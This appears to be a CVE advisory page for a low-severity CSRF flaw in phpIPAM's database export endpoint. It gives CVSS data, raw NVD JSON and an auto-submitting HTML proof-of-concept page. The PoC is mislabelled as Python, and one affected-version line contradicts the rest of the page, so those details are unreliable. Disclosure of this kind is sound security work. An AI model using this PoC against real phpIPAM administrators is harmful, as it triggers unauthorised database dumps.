Security Vulnerability Report
中文
CVE-2025-60912 CVSS 3.3 LOW

CVE-2025-60912

Published: 2025-12-08 15:15:50
Last Modified: 2025-12-10 17:36:32
Source: [email protected]

Description

phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* - VULNERABLE
phpIPAM < 1.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-60912 --> <!-- Auto-trigger database export for phpIPAM v1.7.3 --> <!DOCTYPE html> <html> <head> <title>phpIPAM Database Export CSRF</title> </head> <body> <h2>CVE-2025-60912 CSRF Attack</h2> <p>If you see this message, the attack is in progress...</p> <script type="text/javascript"> // Auto-submit form to trigger database export window.onload = function() { // Target phpIPAM database export endpoint var targetUrl = 'http://target-ip/app/admin/import-export/generate-mysql.php'; // Create and submit GET request fetch(targetUrl, { method: 'GET', credentials: 'include' // Include cookies for authenticated session }) .then(response => response.blob()) .then(blob => { // Download the exported database var url = window.URL.createObjectURL(blob); var a = document.createElement('a'); a.href = url; a.download = 'phpipam_database_export.sql'; document.body.appendChild(a); a.click(); window.URL.revokeObjectURL(url); }) .catch(error => console.log('Export triggered: ' + error)); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60912", "sourceIdentifier": "[email protected]", "published": "2025-12-08T15:15:50.450", "lastModified": "2025-12-10T17:36:31.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.3", "matchCriteriaId": "ECCAE1A5-738E-4649-BAF4-ACC14A8562BA"}]}]}], "references": [{"url": "https://gist.github.com/amandrei/a8377d9b71c55156d22aaaf485463d15", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/phpipam/phpipam", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.